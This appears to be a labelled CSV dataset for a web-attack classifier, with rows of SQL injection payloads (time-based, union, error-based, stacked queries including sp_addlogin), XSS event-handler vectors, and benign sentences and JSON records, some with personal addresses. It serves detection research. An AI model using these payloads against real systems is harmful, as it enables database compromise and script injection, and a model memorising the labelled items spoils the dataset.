"SYDNEY, AUSTRALIA ""The Nose,"" Sydney Opera House Select dates, Feb.",3,normal,25515 "select * from users where id = 1<@<@ union select 1,version ( ) -- 1",2,SQLi,16371 <noframes onpointerleave=alert(1)>XSS</noframes>,1,XSS,5880 Select your contract.,3,normal,24953 1' in boolean mode ) union all select null#,2,SQLi,19247 "<ins draggable=""true"" ondragenter=""alert(1)"">test</ins>",1,XSS,4613 "1"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( ""hxgu"" = ""hxgu",2,SQLi,16388 <svg><h1 onload=alert(1)></h1>,1,XSS,9543 "<dir onclick=""alert(1)"">test</dir>",1,XSS,9210 <%78 onxxx=1,1,XSS,9826 [notmalicious](javascript:window.onerror=alert;throw%20document.cookie),1,XSS,2491 "1'|| ( select 'ssvp' where 3300 = 3300 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11946 Sort results where necessary.,3,normal,23331 <h1 id=x tabindex=1 onfocus=alert(1)></h1>,1,XSS,7393 "<div style=""position:absolute;top:0;left:0;width:100%;height:100%",1,XSS,2851 "1"" ) as dfmm where 7563 = 7563 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14093 Create map.,3,normal,23091 "<datalist onmousedown=""alert(1)"">test</datalist>",1,XSS,5883 "{""id"":null,""firstName"":""Taylor"",""lastName"":""Tan Jia An"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26929 "<shadow oncopy=""alert(1)"" contenteditable>test</shadow>",1,XSS,4454 Amazon Deals HP Laptop Sale Dell Columbus Day Deals Best Buy Columbus Day Sale Lowes (35% off select appliances & power tools) Home Depot (35% off select appliances & power tools),3,normal,26385 Where did you find that inspiring museum?,3,normal,23847 Current / Elliott 25% off your purchase; select exclusions apply; currentelliott.,3,normal,26263 Delete the old emails from your inbox.,3,normal,22910 <var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus>,1,XSS,2481 Insert USB.,3,normal,23043 "1"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""fjwv"" like ""fjwv",2,SQLi,10481 "1"" ) where 6823 = 6823 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11175 select ( case when ( 6969 = 5797 ) then 6969 else 6969* ( select 6969 from information_schema.character_sets ) end ) #,2,SQLi,13269 select * from users where id = 1 +1 or 1 = 1 -- 1,2,SQLi,18549 "1' in boolean mode ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) #",2,SQLi,13320 "1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- ztzu",2,SQLi,11334 1 ) where 2390 = 2390,2,SQLi,21603 <iframe id=x onfocusin=alert(1)>,1,XSS,9438 "1"" ) and sleep ( 5 ) and ( ""fsuf"" like ""fsuf",2,SQLi,19152 "<tbody onmouseenter=""alert(1)"">test</tbody>",1,XSS,7256 "1"" or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13308 "<tbody onbeforepaste=""alert(1)"" contenteditable>test</tbody>",1,XSS,3508 "<style>@keyframes x{}</style><base style=""animation-name:x"" onanimationend=""alert(1)""></base>",1,XSS,1681 1' ) as mara where 7164 = 7164,2,SQLi,20659 "exec sp_addlogin 'name' , 'password' --",2,SQLi,19555 "<kbd onmouseenter=""alert(1)"">test</kbd>",1,XSS,8133 Where's your SQL job?,3,normal,23430 "1' ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15149 "1 ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16988 <svg><xss onload=alert(1)>,1,XSS,9665 1 ) ) as pxmz where 2596 = 2596,2,SQLi,20479 "1"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""oohx"" like ""oohx",2,SQLi,13524 "<footer draggable=""true"" ondragstart=""alert(1)"">test</footer>",1,XSS,3345 "create table myfile (line varchar(8000))"" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'"" select * from myfile""--",2,SQLi,13208 1%' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and '%' = ',2,SQLi,16268 I'm considering where to volunteer this weekend.,3,normal,23830 "1 ) ) as myyh where 5116 = 5116 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12799 1'+ ( select ksoh where 6339 = 6339,2,SQLi,20080 1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'nhrc' like 'nhrc,2,SQLi,16967 "<s onbeforepaste=""alert(1)"" contenteditable>test</s>",1,XSS,5239 "<BASE HREF=""javascript:alert('XSS');//"">",1,XSS,7808 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( '%' = '",2,SQLi,13431 "-4641"" ) where 4212 = 4212 or make_set ( 3595 = 4062,4062 ) --",2,SQLi,16920 "<div draggable=""true"" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable>drop here</hgroup>",1,XSS,1083 1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2006,2,SQLi,18072 "<u onmouseover=""alert(1)"">test</u>",1,XSS,9207 <template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus>,1,XSS,1933 She chose a hiking trail to explore from the map.,3,normal,23986 "<div draggable=""true"" contenteditable>drag me</div><image ondrop=alert(1) contenteditable>drop here</image>",1,XSS,1152 1 where 9393 = 9393 waitfor delay '0:0:5'--,2,SQLi,19246 "<dt onkeyup=""alert(1)"" contenteditable>test</dt>",1,XSS,5951 "</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>",1,XSS,8311 The young Humanists would have gladly welcomed him into their select band.,3,normal,25358 "{""id"":null,""firstName"":""Fabian"",""lastName"":""Lau"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27337 1'|| ( select 'xglm' from dual where 3556 = 3556 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,14286 "<body onpaste=""alert(1)"" contenteditable>test</body>",1,XSS,5179 1'|| ( select 'ocmk' from dual where 3961 = 3961 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ) ||',2,SQLi,14122 "-9286"" ) ) as mfxl where 9348 = 9348 union all select 9348#",2,SQLi,17238 """><iframe src=""javascript:alert(XSS)"">",1,XSS,8314 1 exec sp_ (or exec xp_),2,SQLi,21167 But paying to select a seat doesn't necessarily mean more legroom.,3,normal,26310 "{""id"":null,""firstName"":""Jessie"",""lastName"":""Ting"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27247 "{""id"":null,""firstName"":""Chong Lew"",""lastName"":""Teoh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27540 "1%"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( ""%"" = """,2,SQLi,17043 "<ins onbeforecopy=""alert(1)"" contenteditable>test</ins>",1,XSS,4467 "<audio oncontextmenu=""alert(1)"">test</audio>",1,XSS,6802 <b id=x tabindex=1 onfocus=alert(1)></b>,1,XSS,7990 "<img src=""mocha:document.vulnerable=true;"">",1,XSS,7082 "<tfoot oncontextmenu=""alert(1)"">test</tfoot>",1,XSS,6969 "-7627%"" ) ) union all select 4011,4011,4011,4011,4011,4011,4011,4011,4011,4011--",2,SQLi,15226 <noframes id=x tabindex=1 onactivate=alert(1)></noframes>,1,XSS,4144 Where to start the query?,3,normal,23453 Select that and the driver will know what to do.,3,normal,25612 "<div draggable=""true"" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable>drop here</fieldset>",1,XSS,878 -5137 ) or 9323 = 9323#,2,SQLi,21284 "ORDER BY 1,SLEEP(5)#",2,SQLi,21730 "-6357"" ) order by 1--",2,SQLi,21637 1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'zoin' = 'zoin,2,SQLi,16412 "1 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16003 "<caption draggable=""true"" ondragleave=""alert(1)"">test</caption>",1,XSS,3053 1 and 2620 = 2175,2,SQLi,22106 1' where 4403 = 4403 rlike sleep ( 5 ) #,2,SQLi,19532 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'dthp' = 'dthp",2,SQLi,14623 1' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and 'vwve' like 'vwve,2,SQLi,15352 "<xss onkeyup=""alert(1)"" contenteditable style=display:block>test</xss>",1,XSS,2493 "1%' ) ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15362 1' ) ) as njop where 7001 = 7001,2,SQLi,20262 "<div onbeforecut=""alert(1)"" contenteditable>test</div>",1,XSS,4779 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,9911 Let's explore where the hiking trail ends.,3,normal,23935 Select the item.,3,normal,22883 Filter the spam folder.,3,normal,22719 "-5425 where 5933 = 5933 union all select 5933,5933,5933--",2,SQLi,17556 -8553'+ ( select adko where 1750 = 1750 union all select 1750#,2,SQLi,16982 ));waitfor delay '0:0:__TIME__'--,2,SQLi,20177 "1"" ) as frmp where 6073 = 6073",2,SQLi,20556 "<style>:target {color:red;}</style><noframes id=x style=""transition:color 1s"" ontransitionend=alert(1)></noframes>",1,XSS,855 "{""id"":null,""firstName"":""Ruchirashil"",""lastName"":""Yaddhajit"",""address"":""2276 WILTON DR, WILTON MANORS FL 33305"",""city"":""31"",""telephone"":""826873782""}",3,normal,26841 "1'|| ( select 'ufgs' where 9670 = 9670 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) ||'",2,SQLi,10990 1'||'asd'||',2,SQLi,22337 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( 'xlvt' = 'xlvt",2,SQLi,13145 "1%' ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13427 "Peach + Lily – Select items 50 percent off, through September 5.",3,normal,25791 Create mural.,3,normal,23040 ORDER BY 5,2,SQLi,22420 "Select the page on which you want to move an item, then click edit.",3,normal,25592 "1 ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )",2,SQLi,10917 "<slot draggable=""true"" ondragend=""alert(1)"">test</slot>",1,XSS,4497 <audio onpointerup=alert(1)>XSS</audio>,1,XSS,8176 <animate onpointerover=alert(1)>XSS</animate>,1,XSS,6658 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'tmdj' like 'tmdj",2,SQLi,12063 <sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus>,1,XSS,2370 "<shadow oncut=""alert(1)"" contenteditable>test</shadow>",1,XSS,4782 "1 ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( 1748 = 1748",2,SQLi,12347 I'll select my groomsmen's attire.,3,normal,24418 "-1277"" ) where 6622 = 6622 or 3038 = 3038",2,SQLi,19358 ( 1589 = 1589 ) *1,2,SQLi,22040 Select data where relevant.,3,normal,23397 <big onpointermove=alert(1)>XSS</big>,1,XSS,8719 -8652' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,10671 "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,18249 <fieldset onpointerleave=alert(1)>XSS</fieldset>,1,XSS,5988 "1 where 4448 = 4448 union all select null,null,null,null,null#",2,SQLi,16945 waitfor delay '0:0:5' and 'fjpf' like 'fjpf,2,SQLi,19214 <plaintext onpointerover=alert(1)>XSS</plaintext>,1,XSS,5803 1 ) and sleep ( 5 ),2,SQLi,22011 <input2 onpointerover=alert(1)>XSS</input2>,1,XSS,7209 <title onpointerenter=alert(1)>XSS</title>,1,XSS,7346 "1 ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( 8965 = 8965",2,SQLi,12557 <image onpointerleave=alert(1)>XSS</image>,1,XSS,7563 veris-->group<svg/onload=alert(/XSS/)//,1,XSS,8099 "<style>:target {color: red;}</style><element id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></element>",1,XSS,786 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,12273 "<style>@keyframes x{}</style><picture style=""animation-name:x"" onanimationstart=""alert(1)""></picture>",1,XSS,1411 "1%"" ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ""%"" = """,2,SQLi,10753 "))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((1337""=""1337",2,SQLi,16562 Select the next place to visit.,3,normal,24232 <animatetransform onpointerover=alert(1)>XSS</animatetransform>,1,XSS,3011 1%' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( '%' = ',2,SQLi,18094 "1' ) ) as lizu where 7691 = 7691 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11117 "<small draggable=""true"" ondragend=""alert(1)"">test</small>",1,XSS,4016 "<title onmousemove=""alert(1)"">test</title>",1,XSS,7458 "1 where 1656 = 1656 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12937 "<address draggable=""true"" ondrag=""alert(1)"">test</address>",1,XSS,3865 "waitfor delay '0:0:5' and ( ( ""ykgm"" = ""ykgm",2,SQLi,19141 "<a href=http://foo.bar/#x=`y></a><img alt=""`><img src=xx:x onerror=alert(108)></a>"">",1,XSS,1897 "<head oncopy=""alert(1)"" contenteditable>test</head>",1,XSS,5444 "<style>:target {transform: rotate(180deg);}</style><summary id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></summary>",1,XSS,571 constraint,3,normal,23135 or ( EXISTS ),2,SQLi,22270 "<body onMouseOver body onMouseOver=""javascript:javascript:alert(1)""></body onMouseOver>",1,XSS,1818 "{""id"":null,""name"":""Devimon""}",3,normal,26924 Select hate.,3,normal,24745 "-3721' ) union all select 9050,9050--",2,SQLi,19802 1' ) where 7537 = 7537 and 2006 = 2006,2,SQLi,19735 "{""id"":null,""firstName"":""Ally"",""lastName"":""Bella"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27596 XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>,1,XSS,6104 "<script\x0Ctype=""text/javascript"">javascript:alert(1);</script>",1,XSS,2977 "select count ( * ) from generate_series ( 1,5000000 ) ) +'",2,SQLi,17388 1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and 'iuao' = 'iuao,2,SQLi,10516 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dialog>",1,XSS,192 "Protune remains with some small tweaks New ""linear"" FOV which removes the fisheye automatically Exposure Select, allows you to select a certain area of your photo to select the correct exposure.",3,normal,25764 "1"" ) where 6964 = 6964",2,SQLi,21503 "<style>:target {transform: rotate(180deg);}</style><li id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></li>",1,XSS,701 "{""id"":null,""name"":""Herdier""}",3,normal,27298 "select * from users where id = 1 or "" ) ( "" = 1 or 1 = 1 -- 1",2,SQLi,17014 "1' ) ) as atpy where 9020 = 9020 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12492 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></p>",1,XSS,303 onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//,1,XSS,3422 1 ) as xwgf where 4204 = 4204 and sleep ( 5 ) --,2,SQLi,18735 "<style>:target {color: red;}</style><svg id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></svg>",1,XSS,1062 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( '%' = '",2,SQLi,14458 "-5996 ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10781 "<IMG SRC=x onseeking=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3446 1 ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,17477 "1 ) where 5615 = 5615 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10740 ( select * from ( select ( sleep ( 5 ) ) ) srmq ),2,SQLi,18613 Nordstrom: Enjoy up to 40% off select designer clearance styles.,3,normal,25869 Let's explore where the river flows from.,3,normal,23765 <form onpointerover=alert(1)>XSS</form>,1,XSS,8211 "<time onmouseenter=""alert(1)"">test</time>",1,XSS,7682 "1"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11336 "<img src=1 href=1 onerror=""javascript:alert(1)""></img>",1,XSS,4644 Select a new playlist to listen to.,3,normal,24109 "1' ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( 'jylk' = 'jylk",2,SQLi,12970 "STYLE=""width: expression(alert(''))",1,XSS,9010 "<slot onmousemove=""alert(1)"">test</slot>",1,XSS,7999 <figure id=x tabindex=1 onfocus=alert(1)></figure>,1,XSS,5602 <%00script>alert(‘XSS’)<%00/script>,1,XSS,9154 <div id=x tabindex=1 onfocus=alert(1)></div>,1,XSS,7025 1' ) ) and 6690 = 3250#,2,SQLi,21308 "-3902' ) ) ) union all select 3999,3999,3999,3999,3999,3999,3999,3999,3999#",2,SQLi,15660 1'|| ( select 'awba' from dual where 3749 = 3749 and 1445 = 3334--,2,SQLi,16633 "1 ) ) union all select null,null,null#",2,SQLi,19762 <thead id=x tabindex=1 onfocus=alert(1)></thead>,1,XSS,5897 "-3472' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10701 <textarea autofocus onfocus=alert(1)>,1,XSS,8757 "<IMG SRC=x onstorage=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3438 "1'+ ( select aahc where 5436 = 5436 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) +'",2,SQLi,14589 1%' ) ) ) rlike ( select ( case when ( 7697 = 3334 ) then 1 else 0x28 end ) ) and ( ( ( '%' = ',2,SQLi,14397 1%' and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,18101 <output onpointerenter=alert(1)>XSS</output>,1,XSS,6896 "1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'oucg' = 'oucg",2,SQLi,17453 1' where 9583 = 9583 and 5319 = 7670#,2,SQLi,19854 "1 ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 9509 = 9509",2,SQLi,12781 "<blink onmouseup=""alert(1)"">test</blink>",1,XSS,8053 <button onUndo=javascript:alert(1)>,1,XSS,9149 "<dfn onbeforecopy=""alert(1)"" contenteditable>test</dfn>",1,XSS,4557 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11320 "<style draggable=""true"" ondrag=""alert(1)"">test</style>",1,XSS,4737 "-1203"" ) ) or 8571 = 8571--",2,SQLi,20909 "<style>:target {color:red;}</style><abbr id=x style=""transition:color 1s"" ontransitionend=alert(1)></abbr>",1,XSS,1220 "1' and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13470 or 1 = 1/*,2,SQLi,22433 "Get $100 off select PlayStation 4 consoles, $100-$150 off select Xbox One consoles, and a $49.993 gift coupon when you buy the Nintendo Switch.",3,normal,26154 "&lt;TABLE BACKGROUND=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,3989 "-8608"" or 5460 = 4461--",2,SQLi,21326 "Keep in mind that this is only a very small list of the possible names you could select for your baby, however.",3,normal,25927 -2316' ) ) ) or 8519 = 6010,2,SQLi,20906 Fetch data where necessary.,3,normal,23370 "data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+",1,XSS,5701 Select age.,3,normal,24778 "select * from users where id = 1 + ( 1 ) union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14016 "-9699"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""dufs"" = ""dufs",2,SQLi,17364 "<! foo=""[[[Inception]]""><x foo=""]foo><script>alert(1)</script>"">",1,XSS,2871 "1' ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11993 "1"" ) union all select null--",2,SQLi,20845 1' ) and 9198 = 9198--,2,SQLi,21388 "1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'dfsj' = 'dfsj",2,SQLi,14231 "<% foo><x foo=""%><script>alert(91)</script>"">//[""'`-->]]>]</div>",1,XSS,2963 "1 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14196 "<xss draggable=""true"" ondragenter=""alert(1)"" style=display:block>test</xss>",1,XSS,2202 "1' ) as fxuk where 6184 = 6184 and make_set ( 9292 = 2785,2785 ) --",2,SQLi,16506 "<br onkeydown=""alert(1)"" contenteditable>test</br>",1,XSS,5594 "<noembed><img title=""</noembed><img src onerror=alert(1)>""></noembed>",1,XSS,2559 -3166'|| ( select 'mtan' from dual where 9420 = 9420 union all select 9420#,2,SQLi,15610 Select your committee.,3,normal,24871 "1"" ) as wehx where 5744 = 5744",2,SQLi,20609 javascript:alert(1)//INJECTX,1,XSS,9640 <aside id=x tabindex=1 onfocusin=alert(1)></aside>,1,XSS,5541 -5026' or ( 8459 = 8459 ) *4906 and 'uavj' like 'uavj,2,SQLi,18056 "1"" ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ""nubc"" like ""nubc",2,SQLi,12898 "1"" ) ) as rcse where 4559 = 4559 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12207 Bissell 86T3 Big Green Professional Carpet Cleaner Machine Save up to 25603% off select Emerson Ceiling Fans Up to 30% off select Patio String Lights File for Free with Credit Karma Tax Up to 80% off select nonfiction reads on Kindle Up to 40% off select Organic Japanese Matcha Up to 23% off select Solar Panels and Electrical Equipment Nintendo Switch Pikachu Edition Bundle with Let's Go Pikachu!,3,normal,26324 Order a large latte.,3,normal,22623 <discard onpointerenter=alert(1)>XSS</discard>,1,XSS,6297 "<kbd draggable=""true"" ondragstart=""alert(1)"">test</kbd>",1,XSS,4501 "<div draggable=""true"" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody>",1,XSS,1156 1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337,2,SQLi,18663 "select * from users where id = 1 -@<@ union select version ( ) ,version ( ) -- 1",2,SQLi,15175 &#x3c,1,XSS,9877 "1"" where 7739 = 7739 and sleep ( 5 ) --",2,SQLi,19578 <source onpointerout=alert(1)>XSS</source>,1,XSS,7403 "-9934"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""xecb"" like ""xecb",2,SQLi,10272 "<legend onmouseout=""alert(1)"">test</legend>",1,XSS,7161 select sleep ( 5 ) and ( ( ( 8354 = 8354,2,SQLi,19516 "-5132%"" ) ) or 3038 = 3038",2,SQLi,20962 "-2898"" where 3301 = 3301 union all select 3301,3301,3301,3301,3301,3301,3301,3301,3301,3301#",2,SQLi,14613 <title id=x tabindex=1 onactivate=alert(1)></title>,1,XSS,5425 <article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus>,1,XSS,2051 "1%"" ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ""%"" = """,2,SQLi,13192 "1"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ""dtwv"" like ""dtwv",2,SQLi,11859 "-1513"" ) as swvd where 2958 = 2958 union all select 2958,2958,2958--",2,SQLi,16395 <svg><nobr onload=alert(1)></nobr>,1,XSS,9211 Top Senate Republicans are resisting a select committee so far.,3,normal,25241 "{""id"":null,""firstName"":""Liew"",""lastName"":""Woon"",""address"":""21 Choa Chu Kang Nth 6 Yew Tee Point S()"",""city"":""897"",""telephone"":""3384577811""}",3,normal,27350 "1%' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14099 "1' ) ) as oldh where 9551 = 9551 union all select null,null,null#",2,SQLi,16670 1' ) ) ) union all select null#,2,SQLi,20470 1%' and 1736 = 4220,2,SQLi,21949 "1"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""eslo"" like ""eslo",2,SQLi,14510 "1 where 5627 = 5627 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14281 <em id=x tabindex=1 onactivate=alert(1)></em>,1,XSS,6619 "<map onmouseleave=""alert(1)"">test</map>",1,XSS,8123 <head onpointerdown=alert(1)>XSS</head>,1,XSS,8158 "<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:javascript:alert(1);"">",1,XSS,1804 <datalist id=x tabindex=1 